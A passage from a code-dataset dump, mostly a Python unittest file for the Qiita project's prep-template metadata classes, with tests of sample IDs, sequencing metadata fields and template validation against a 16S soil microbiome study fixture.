}\n","repo_name":"yt-dlp/yt-dlp","sub_path":"yt_dlp/extractor/crtvg.py","file_name":"crtvg.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":60520,"dataset":"github-code","pt":"78"} +{"seq_id":"2140886972","text":"from unittest import TestCase, main\nfrom tempfile import mkstemp\nfrom os import close, remove\nfrom os.path import join, exists\nfrom collections import Iterable\nfrom copy import deepcopy\nfrom datetime import datetime\n\nimport numpy.testing as npt\nimport pandas as pd\nfrom pandas.testing import assert_frame_equal\n\nfrom qiita_core.util import qiita_test_checker\nfrom qiita_core.exceptions import IncompetentQiitaDeveloperError\nimport qiita_db as qdb\n\n\n@qiita_test_checker()\nclass TestPrepSample(TestCase):\n def setUp(self):\n self.prep_template = \\\n qdb.metadata_template.prep_template.PrepTemplate(1)\n self.sample_id = '1.SKB8.640193'\n self.tester = qdb.metadata_template.prep_template.PrepSample(\n self.sample_id, self.prep_template)\n self.exp_categories = {'center_name', 'center_project_name',\n 'emp_status', 'barcode', 'instrument_model',\n 'library_construction_protocol',\n 'primer', 'target_subfragment',\n 'target_gene', 'run_center', 'run_prefix',\n 'run_date', 'experiment_center',\n 'experiment_design_description',\n 'experiment_title', 'platform', 'samp_size',\n 'sequencing_meth', 'illumina_technology',\n 'sample_center', 'pcr_primers', 'study_center'}\n\n def test_init_unknown_error(self):\n \"\"\"Init errors if the PrepSample id is not found in the template\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBUnknownIDError):\n qdb.metadata_template.prep_template.PrepSample(\n 'Not_a_Sample', self.prep_template)\n\n def test_init_wrong_template(self):\n \"\"\"Raises an error if using a SampleTemplate instead of PrepTemplate\"\"\"\n with self.assertRaises(IncompetentQiitaDeveloperError):\n qdb.metadata_template.prep_template.PrepSample(\n '1.SKB8.640193',\n qdb.metadata_template.sample_template.SampleTemplate(1))\n\n def test_init(self):\n \"\"\"Init correctly initializes the PrepSample object\"\"\"\n sample = qdb.metadata_template.prep_template.PrepSample(\n self.sample_id, self.prep_template)\n # Check that the internal id have been correctly set\n self.assertEqual(sample._id, '1.SKB8.640193')\n # Check that the internal template have been correctly set\n self.assertEqual(sample._md_template, 
self.prep_template)\n # Check that the internal dynamic table name have been correctly set\n self.assertEqual(sample._dynamic_table, \"prep_1\")\n\n def test_eq_true(self):\n \"\"\"Equality correctly returns true\"\"\"\n other = qdb.metadata_template.prep_template.PrepSample(\n self.sample_id, self.prep_template)\n self.assertTrue(self.tester == other)\n\n def test_eq_false_type(self):\n \"\"\"Equality returns false if types are not equal\"\"\"\n other = qdb.metadata_template.sample_template.Sample(\n self.sample_id,\n qdb.metadata_template.sample_template.SampleTemplate(1))\n self.assertFalse(self.tester == other)\n\n def test_eq_false_id(self):\n \"\"\"Equality returns false if ids are different\"\"\"\n other = qdb.metadata_template.prep_template.PrepSample(\n '1.SKD8.640184', self.prep_template)\n self.assertFalse(self.tester == other)\n\n def test_exists_true(self):\n \"\"\"Exists returns true if the PrepSample exists\"\"\"\n self.assertTrue(qdb.metadata_template.prep_template.PrepSample.exists(\n self.sample_id, self.prep_template))\n\n def test_exists_false(self):\n \"\"\"Exists returns false if the PrepSample does not exists\"\"\"\n self.assertFalse(qdb.metadata_template.prep_template.PrepSample.exists(\n 'Not_a_Sample', self.prep_template))\n\n def test_get_categories(self):\n \"\"\"Correctly returns the set of category headers\"\"\"\n obs = self.tester._get_categories()\n self.assertEqual(obs, self.exp_categories)\n\n def test_len(self):\n \"\"\"Len returns the correct number of categories\"\"\"\n self.assertEqual(len(self.tester), 22)\n\n def test_getitem_required(self):\n \"\"\"Get item returns the correct metadata value from the required table\n \"\"\"\n self.assertEqual(self.tester['center_name'], 'ANL')\n self.assertTrue(self.tester['center_project_name'] is None)\n\n def test_getitem_dynamic(self):\n \"\"\"Get item returns the correct metadata value from the dynamic table\n \"\"\"\n self.assertEqual(self.tester['pcr_primers'],\n 'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT')\n self.assertEqual(self.tester['barcode'], 'AGCGCTCACATC')\n\n def test_getitem_id_column(self):\n \"\"\"Get item returns the correct metadata value from the changed column\n \"\"\"\n self.assertEqual(self.tester['emp_status'], 'EMP')\n\n def test_getitem_error(self):\n \"\"\"Get item raises an error if category does not exists\"\"\"\n with self.assertRaises(KeyError):\n self.tester['Not_a_Category']\n\n def test_iter(self):\n \"\"\"iter returns an iterator over the category headers\"\"\"\n obs = self.tester.__iter__()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_categories)\n\n def test_contains_true(self):\n \"\"\"contains returns true if the category header exists\"\"\"\n self.assertTrue('Barcode' in self.tester)\n self.assertTrue('barcode' in self.tester)\n\n def test_contains_false(self):\n \"\"\"contains returns false if the category header does not exists\"\"\"\n self.assertFalse('Not_a_Category' in self.tester)\n\n def test_keys(self):\n \"\"\"keys returns an iterator over the metadata headers\"\"\"\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_categories)\n\n def test_values(self):\n \"\"\"values returns an iterator over the values\"\"\"\n obs = self.tester.values()\n self.assertTrue(isinstance(obs, Iterable))\n exp = {'ANL', None, None, None, 'EMP', 'AGCGCTCACATC',\n 'This analysis was done as in Caporaso et al 2011 Genome '\n 'research. 
The PCR primers (F515/R806) were developed against '\n 'the V4 region of the 16S rRNA (both bacteria and archaea), '\n 'which we determined would yield optimal community clustering '\n 'with reads of this length using a procedure similar to that of'\n ' ref. 15. [For reference, this primer pair amplifies the '\n 'region 533_786 in the Escherichia coli strain 83972 sequence '\n '(greengenes accession no. prokMSA_id:470367).] The reverse PCR'\n ' primer is barcoded with a 12-base error-correcting Golay code'\n ' to facilitate multiplexing of up to 1,500 samples per lane, '\n 'and both PCR primers contain sequencer adapter regions.',\n 'GTGCCAGCMGCCGCGGTAA', 'V4', '16S rRNA', 'ANL',\n 's_G1_L001_sequences', '8/1/12', 'ANL',\n 'micro biome of soil and rhizosphere of cannabis plants from '\n 'CA', 'Cannabis Soil Microbiome', 'Illumina', 'Illumina MiSeq',\n '.25,g', 'Sequencing by synthesis', 'MiSeq', 'ANL',\n 'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT', 'CCME'}\n self.assertEqual(set(obs), exp)\n\n def test_items(self):\n \"\"\"items returns an iterator over the (key, value) tuples\"\"\"\n obs = self.tester.items()\n self.assertTrue(isinstance(obs, Iterable))\n exp = {('center_name', 'ANL'), ('center_project_name', None),\n ('emp_status', 'EMP'), ('barcode', 'AGCGCTCACATC'),\n ('library_construction_protocol',\n 'This analysis was done as in Caporaso et al 2011 Genome '\n 'research. The PCR primers (F515/R806) were developed against '\n 'the V4 region of the 16S rRNA (both bacteria and archaea), '\n 'which we determined would yield optimal community clustering '\n 'with reads of this length using a procedure similar to that '\n 'of ref. 15. [For reference, this primer pair amplifies the '\n 'region 533_786 in the Escherichia coli strain 83972 sequence '\n '(greengenes accession no. prokMSA_id:470367).] 
The reverse '\n 'PCR primer is barcoded with a 12-base error-correcting Golay '\n 'code to facilitate multiplexing of up to 1,500 samples per '\n 'lane, and both PCR primers contain sequencer adapter '\n 'regions.'), ('primer', 'GTGCCAGCMGCCGCGGTAA'),\n ('target_subfragment', 'V4'), ('target_gene', '16S rRNA'),\n ('run_center', 'ANL'), ('run_prefix', 's_G1_L001_sequences'),\n ('run_date', '8/1/12'), ('experiment_center', 'ANL'),\n ('experiment_design_description',\n 'micro biome of soil and rhizosphere of cannabis plants '\n 'from CA'), ('experiment_title', 'Cannabis Soil Microbiome'),\n ('platform', 'Illumina'),\n ('instrument_model', 'Illumina MiSeq'), ('samp_size', '.25,g'),\n ('sequencing_meth', 'Sequencing by synthesis'),\n ('illumina_technology', 'MiSeq'), ('sample_center', 'ANL'),\n ('pcr_primers',\n 'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT'),\n ('study_center', 'CCME')}\n self.assertEqual(set(obs), exp)\n\n def test_get(self):\n \"\"\"get returns the correct sample object\"\"\"\n self.assertEqual(self.tester.get('barcode'), 'AGCGCTCACATC')\n\n def test_get_none(self):\n \"\"\"get returns none if the sample id is not present\"\"\"\n self.assertTrue(self.tester.get('Not_a_Category') is None)\n\n def test_columns_restrictions(self):\n \"\"\"that it returns SAMPLE_TEMPLATE_COLUMNS\"\"\"\n exp = deepcopy(qdb.metadata_template.constants.PREP_TEMPLATE_COLUMNS)\n exp.update(\n qdb.metadata_template.constants.PREP_TEMPLATE_COLUMNS_TARGET_GENE)\n self.assertEqual(self.prep_template.columns_restrictions, exp)\n\n def test_can_be_updated(self):\n \"\"\"test if the template can be updated\"\"\"\n # you can't update restricted colums in a pt with data\n self.assertFalse(self.prep_template.can_be_updated({'barcode'}))\n # but you can if not restricted\n self.assertTrue(self.prep_template.can_be_updated({'center_name'}))\n\n def test_can_be_extended(self):\n \"\"\"test if the template can be extended\"\"\"\n # You can always add columns\n obs_bool, obs_msg = self.prep_template.can_be_extended([], [\"NEW_COL\"])\n self.assertTrue(obs_bool)\n self.assertEqual(obs_msg, \"\")\n # You can't add samples if there are preprocessed data generated\n obs_bool, obs_msg = self.prep_template.can_be_extended(\n [\"NEW_SAMPLE\"], [])\n self.assertFalse(obs_bool)\n exp_msg = (\"The artifact attached to the prep template has already \"\n \"been processed. 
No new samples can be added to the prep \"\n \"template\")\n self.assertEqual(obs_msg, exp_msg)\n\n def test_can_be_extended_duplicated_column(self):\n \"\"\"test if the template can be extended\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n self.prep_template.can_be_extended([], [\"season_environment\"])\n\n def test_metadata_headers(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n obs = PT.metadata_headers()\n exp = ['barcode', 'center_name', 'center_project_name', 'emp_status',\n 'experiment_center', 'experiment_design_description',\n 'experiment_title', 'illumina_technology', 'instrument_model',\n 'library_construction_protocol', 'pcr_primers', 'platform',\n 'primer', 'run_center', 'run_date', 'run_prefix', 'samp_size',\n 'sample_center', 'sequencing_meth', 'study_center',\n 'target_gene', 'target_subfragment']\n self.assertCountEqual(obs, exp)\n\n def test_setitem(self):\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n self.tester['column that does not exist'] = 0.3\n\n tester = qdb.metadata_template.prep_template.PrepSample(\n '1.SKD8.640184', self.prep_template)\n\n self.assertEqual(tester['center_name'], 'ANL')\n tester['center_name'] = \"FOO\"\n self.assertEqual(tester['center_name'], \"FOO\")\n\n def test_delitem(self):\n \"\"\"delitem raises an error (currently not allowed)\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBNotImplementedError):\n del self.tester['pcr_primers']\n\n\n@qiita_test_checker()\nclass TestPrepTemplate(TestCase):\n def setUp(self):\n # qdb.metadata_template.base_metadata_template.QIITA_COLUMN_NAME is\n # the name of the sample where we store all columns for a sample/prep\n # information and in this tests we want to avoid having to import it\n # in different places so adding to the setUp\n self.QCN = \\\n qdb.metadata_template.base_metadata_template.QIITA_COLUMN_NAME\n self.metadata_dict = {\n 'SKB8.640193': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 1',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'GTCCGCAAGTTA',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': '3.6',\n 'experiment_design_description': 'BBBB'},\n 'SKD8.640184': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 2',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CGTAGAGCTCTC',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'NoT applicable',\n 'experiment_design_description': 'BBBB'},\n 'SKB7.640196': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 3',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CCTCTGAGAGCT',\n 'run_prefix': \"s_G1_L002_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'unspecified',\n 'experiment_design_description': 'BBBB'}\n }\n self.metadata = pd.DataFrame.from_dict(self.metadata_dict,\n orient='index', dtype=str)\n\n metadata_prefixed_dict = {\n '1.SKB8.640193': {'center_name': 'ANL',\n 
'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 1',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'GTCCGCAAGTTA',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': '3.6',\n 'experiment_design_description': 'BBBB'},\n '1.SKD8.640184': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 2',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CGTAGAGCTCTC',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'not applicable',\n 'experiment_design_description': 'BBBB'},\n '1.SKB7.640196': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'EMP_status': 'EMP',\n 'str_column': 'Value for sample 3',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CCTCTGAGAGCT',\n 'run_prefix': \"s_G1_L002_sequences\",\n 'platform': 'Illumina',\n 'qiita_prep_id': 1000,\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'not applicable',\n 'experiment_design_description': 'BBBB'}\n }\n self.metadata_prefixed = pd.DataFrame.from_dict(metadata_prefixed_dict,\n orient='index')\n\n self.test_study = qdb.study.Study(1)\n self.data_type = \"18S\"\n self.data_type_id = 2\n\n self.tester = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.exp_sample_ids = {\n '1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195', '1.SKB4.640189',\n '1.SKB5.640181', '1.SKB6.640176', '1.SKB7.640196', '1.SKB8.640193',\n '1.SKB9.640200', '1.SKD1.640179', '1.SKD2.640178', '1.SKD3.640198',\n '1.SKD4.640185', '1.SKD5.640186', '1.SKD6.640190', '1.SKD7.640191',\n '1.SKD8.640184', '1.SKD9.640182', '1.SKM1.640183', '1.SKM2.640199',\n '1.SKM3.640197', '1.SKM4.640180', '1.SKM5.640177', '1.SKM6.640187',\n '1.SKM7.640188', '1.SKM8.640201', '1.SKM9.640192'}\n\n # Generate some files for new artifact\n fd, fp1 = mkstemp(suffix='_seqs.fastq')\n close(fd)\n with open(fp1, 'w') as f:\n f.write(\"@HWI-ST753:189:D1385ACXX:1:1101:1214:1906 1:N:0:\\n\"\n \"NACGTAGGGTGCAAGCGTTGTCCGGAATNA\\n\"\n \"+\\n\"\n \"#1=DDFFFHHHHHJJJJJJJJJJJJGII#0\\n\")\n fd, fp2 = mkstemp(suffix='_barcodes.fastq')\n close(fd)\n with open(fp2, 'w') as f:\n f.write(\"@HWI-ST753:189:D1385ACXX:1:1101:1214:1906 2:N:0:\\n\"\n \"NNNCNNNNNNNNN\\n\"\n \"+\\n\"\n \"#############\\n\")\n self.filepaths = [(fp1, 1), (fp2, 3)]\n self._clean_up_files = [fp1, fp2]\n\n def tearDown(self):\n for f in self._clean_up_files:\n if exists(f):\n remove(f)\n\n def test_study_id(self):\n \"\"\"Ensure that the correct study ID is returned\"\"\"\n self.assertEqual(self.tester.study_id, 1)\n\n def test_init_unknown_error(self):\n \"\"\"Init raises an error if the id is not known\"\"\"\n with self.assertRaises(qdb.exceptions.QiitaDBUnknownIDError):\n qdb.metadata_template.prep_template.PrepTemplate(30000)\n\n def test_init(self):\n \"\"\"Init successfully instantiates the object\"\"\"\n st = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.assertTrue(st.id, 1)\n\n def test_table_name(self):\n \"\"\"Table name return the correct string\"\"\"\n obs = qdb.metadata_template.prep_template.PrepTemplate._table_name(1)\n self.assertEqual(obs, 
\"prep_1\")\n\n def test_exists_true(self):\n \"\"\"Exists returns true when the PrepTemplate already exists\"\"\"\n self.assertTrue(\n qdb.metadata_template.prep_template.PrepTemplate.exists(1))\n\n def test_exists_false(self):\n \"\"\"Exists returns false when the PrepTemplate does not exists\"\"\"\n self.assertFalse(\n qdb.metadata_template.prep_template.PrepTemplate.exists(30000))\n\n def test_get_sample_ids(self):\n \"\"\"get_sample_ids returns the correct set of sample ids\"\"\"\n obs = self.tester._get_sample_ids()\n self.assertEqual(obs, self.exp_sample_ids)\n\n def test_len(self):\n \"\"\"Len returns the correct number of sample ids\"\"\"\n self.assertEqual(len(self.tester), 27)\n\n def test_getitem(self):\n \"\"\"Get item returns the correct sample object\"\"\"\n obs = self.tester['1.SKM7.640188']\n exp = qdb.metadata_template.prep_template.PrepSample(\n '1.SKM7.640188', self.tester)\n self.assertEqual(obs, exp)\n\n def test_getitem_error(self):\n \"\"\"Get item raises an error if key does not exists\"\"\"\n with self.assertRaises(KeyError):\n self.tester['Not_a_Sample']\n\n def test_iter(self):\n \"\"\"iter returns an iterator over the sample ids\"\"\"\n obs = self.tester.__iter__()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_sample_ids)\n\n def test_contains_true(self):\n \"\"\"contains returns true if the sample id exists\"\"\"\n self.assertTrue('1.SKM7.640188' in self.tester)\n\n def test_contains_false(self):\n \"\"\"contains returns false if the sample id does not exists\"\"\"\n self.assertFalse('Not_a_Sample' in self.tester)\n\n def test_keys(self):\n \"\"\"keys returns an iterator over the sample ids\"\"\"\n obs = self.tester.keys()\n self.assertTrue(isinstance(obs, Iterable))\n self.assertEqual(set(obs), self.exp_sample_ids)\n\n def test_values(self):\n \"\"\"values returns an iterator over the values\"\"\"\n obs = self.tester.values()\n self.assertTrue(isinstance(obs, Iterable))\n exp = {qdb.metadata_template.prep_template.PrepSample('1.SKB1.640202',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB2.640194',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB3.640195',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB4.640189',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB5.640181',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB6.640176',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB7.640196',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB8.640193',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKB9.640200',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD1.640179',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD2.640178',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD3.640198',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD4.640185',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD5.640186',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD6.640190',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD7.640191',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD8.640184',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKD9.640182',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM1.640183',\n self.tester),\n 
qdb.metadata_template.prep_template.PrepSample('1.SKM2.640199',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM3.640197',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM4.640180',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM5.640177',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM6.640187',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM7.640188',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM8.640201',\n self.tester),\n qdb.metadata_template.prep_template.PrepSample('1.SKM9.640192',\n self.tester)}\n # Creating a list and looping over it since unittest does not call\n # the __eq__ function on the objects\n for o, e in zip(sorted(list(obs), key=lambda x: x.id),\n sorted(exp, key=lambda x: x.id)):\n self.assertEqual(o, e)\n\n def test_items(self):\n \"\"\"items returns an iterator over the (key, value) tuples\"\"\"\n obs = self.tester.items()\n self.assertTrue(isinstance(obs, Iterable))\n exp = [('1.SKB1.640202',\n qdb.metadata_template.prep_template.PrepSample('1.SKB1.640202',\n self.tester)),\n ('1.SKB2.640194',\n qdb.metadata_template.prep_template.PrepSample('1.SKB2.640194',\n self.tester)),\n ('1.SKB3.640195',\n qdb.metadata_template.prep_template.PrepSample('1.SKB3.640195',\n self.tester)),\n ('1.SKB4.640189',\n qdb.metadata_template.prep_template.PrepSample('1.SKB4.640189',\n self.tester)),\n ('1.SKB5.640181',\n qdb.metadata_template.prep_template.PrepSample('1.SKB5.640181',\n self.tester)),\n ('1.SKB6.640176',\n qdb.metadata_template.prep_template.PrepSample('1.SKB6.640176',\n self.tester)),\n ('1.SKB7.640196',\n qdb.metadata_template.prep_template.PrepSample('1.SKB7.640196',\n self.tester)),\n ('1.SKB8.640193',\n qdb.metadata_template.prep_template.PrepSample('1.SKB8.640193',\n self.tester)),\n ('1.SKB9.640200',\n qdb.metadata_template.prep_template.PrepSample('1.SKB9.640200',\n self.tester)),\n ('1.SKD1.640179',\n qdb.metadata_template.prep_template.PrepSample('1.SKD1.640179',\n self.tester)),\n ('1.SKD2.640178',\n qdb.metadata_template.prep_template.PrepSample('1.SKD2.640178',\n self.tester)),\n ('1.SKD3.640198',\n qdb.metadata_template.prep_template.PrepSample('1.SKD3.640198',\n self.tester)),\n ('1.SKD4.640185',\n qdb.metadata_template.prep_template.PrepSample('1.SKD4.640185',\n self.tester)),\n ('1.SKD5.640186',\n qdb.metadata_template.prep_template.PrepSample('1.SKD5.640186',\n self.tester)),\n ('1.SKD6.640190',\n qdb.metadata_template.prep_template.PrepSample('1.SKD6.640190',\n self.tester)),\n ('1.SKD7.640191',\n qdb.metadata_template.prep_template.PrepSample('1.SKD7.640191',\n self.tester)),\n ('1.SKD8.640184',\n qdb.metadata_template.prep_template.PrepSample('1.SKD8.640184',\n self.tester)),\n ('1.SKD9.640182',\n qdb.metadata_template.prep_template.PrepSample('1.SKD9.640182',\n self.tester)),\n ('1.SKM1.640183',\n qdb.metadata_template.prep_template.PrepSample('1.SKM1.640183',\n self.tester)),\n ('1.SKM2.640199',\n qdb.metadata_template.prep_template.PrepSample('1.SKM2.640199',\n self.tester)),\n ('1.SKM3.640197',\n qdb.metadata_template.prep_template.PrepSample('1.SKM3.640197',\n self.tester)),\n ('1.SKM4.640180',\n qdb.metadata_template.prep_template.PrepSample('1.SKM4.640180',\n self.tester)),\n ('1.SKM5.640177',\n qdb.metadata_template.prep_template.PrepSample('1.SKM5.640177',\n self.tester)),\n ('1.SKM6.640187',\n qdb.metadata_template.prep_template.PrepSample('1.SKM6.640187',\n self.tester)),\n ('1.SKM7.640188',\n 
qdb.metadata_template.prep_template.PrepSample('1.SKM7.640188',\n self.tester)),\n ('1.SKM8.640201',\n qdb.metadata_template.prep_template.PrepSample('1.SKM8.640201',\n self.tester)),\n ('1.SKM9.640192',\n qdb.metadata_template.prep_template.PrepSample('1.SKM9.640192',\n self.tester))]\n # Creating a list and looping over it since unittest does not call\n # the __eq__ function on the objects\n for o, e in zip(sorted(list(obs)), sorted(exp)):\n self.assertEqual(o, e)\n\n def test_get(self):\n \"\"\"get returns the correct PrepSample object\"\"\"\n obs = self.tester.get('1.SKM7.640188')\n exp = qdb.metadata_template.prep_template.PrepSample(\n '1.SKM7.640188', self.tester)\n self.assertEqual(obs, exp)\n\n def test_get_none(self):\n \"\"\"get returns none if the sample id is not present\"\"\"\n self.assertTrue(self.tester.get('Not_a_Sample') is None)\n\n def test_data_type(self):\n \"\"\"data_type returns the string with the data_type\"\"\"\n self.assertTrue(self.tester.data_type(), \"18S\")\n\n def test_data_type_id(self):\n \"\"\"data_type returns the int with the data_type_id\"\"\"\n self.assertTrue(self.tester.data_type(ret_id=True), 2)\n\n def test_investigation_type(self):\n \"\"\"investigation_type works correctly\"\"\"\n self.assertEqual(self.tester.investigation_type, \"Metagenomics\")\n\n def test_to_dataframe(self):\n obs = self.tester.to_dataframe()\n # We don't test the specific values as this would blow up the size\n # of this file as the amount of lines would go to ~1000\n\n # 27 samples\n self.assertEqual(len(obs), 27)\n self.assertEqual(set(obs.index), {\n u'1.SKB1.640202', u'1.SKB2.640194', u'1.SKB3.640195',\n u'1.SKB4.640189', u'1.SKB5.640181', u'1.SKB6.640176',\n u'1.SKB7.640196', u'1.SKB8.640193', u'1.SKB9.640200',\n u'1.SKD1.640179', u'1.SKD2.640178', u'1.SKD3.640198',\n u'1.SKD4.640185', u'1.SKD5.640186', u'1.SKD6.640190',\n u'1.SKD7.640191', u'1.SKD8.640184', u'1.SKD9.640182',\n u'1.SKM1.640183', u'1.SKM2.640199', u'1.SKM3.640197',\n u'1.SKM4.640180', u'1.SKM5.640177', u'1.SKM6.640187',\n u'1.SKM7.640188', u'1.SKM8.640201', u'1.SKM9.640192'})\n\n self.assertEqual(set(obs.columns), {\n u'center_name', u'center_project_name',\n u'emp_status', u'barcode',\n u'library_construction_protocol', u'primer',\n u'target_subfragment', u'target_gene', u'run_center',\n u'run_prefix', u'run_date', u'experiment_center',\n u'experiment_design_description', u'experiment_title', u'platform',\n u'instrument_model', u'samp_size', u'sequencing_meth',\n u'illumina_technology', u'sample_center', u'pcr_primers',\n u'study_center', 'qiita_prep_id'})\n\n # test with add_ebi_accessions as True\n obs = self.tester.to_dataframe(True)\n self.assertEqual(\n self.tester.ebi_experiment_accessions,\n obs.qiita_ebi_experiment_accessions.to_dict())\n\n def test_clean_validate_template_error_bad_chars(self):\n \"\"\"Raises an error if there are invalid characters in the sample names\n \"\"\"\n self.metadata.index = ['o()xxxx[{::::::::>', 'sample.1', 'sample.3']\n PT = qdb.metadata_template.prep_template.PrepTemplate\n with self.assertRaises(qdb.exceptions.QiitaDBColumnError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_error_duplicate_cols(self):\n \"\"\"Raises an error if there are duplicated columns in the template\"\"\"\n self.metadata['STR_COLUMN'] = pd.Series(['', '', ''],\n index=self.metadata.index)\n PT = qdb.metadata_template.prep_template.PrepTemplate\n with self.assertRaises(qdb.exceptions.QiitaDBDuplicateHeaderError):\n 
PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template_error_duplicate_samples(self):\n \"\"\"Raises an error if there are duplicated samples in the templates\"\"\"\n self.metadata.index = ['sample.1', 'sample.1', 'sample.3']\n PT = qdb.metadata_template.prep_template.PrepTemplate\n with self.assertRaises(qdb.exceptions.QiitaDBDuplicateSamplesError):\n PT._clean_validate_template(self.metadata, 2)\n\n def test_clean_validate_template(self):\n PT = qdb.metadata_template.prep_template.PrepTemplate\n # modify input to make sure we hit all cases\n md = self.metadata.copy()\n md.loc['SKB7.640196']['str_column'] = 'UnSpeciFied'\n obs = PT._clean_validate_template(md, 2)\n metadata_dict = {\n '2.SKB8.640193': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'emp_status': 'EMP',\n 'str_column': 'Value for sample 1',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'GTCCGCAAGTTA',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': '3.6',\n 'experiment_design_description': 'BBBB'},\n '2.SKD8.640184': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'emp_status': 'EMP',\n 'str_column': 'Value for sample 2',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CGTAGAGCTCTC',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'not applicable',\n 'experiment_design_description': 'BBBB'},\n '2.SKB7.640196': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'emp_status': 'EMP',\n 'str_column': 'not applicable',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'barcode': 'CCTCTGAGAGCT',\n 'run_prefix': \"s_G1_L002_sequences\",\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'insdc_nulls': 'not applicable',\n 'experiment_design_description': 'BBBB'}\n }\n exp = 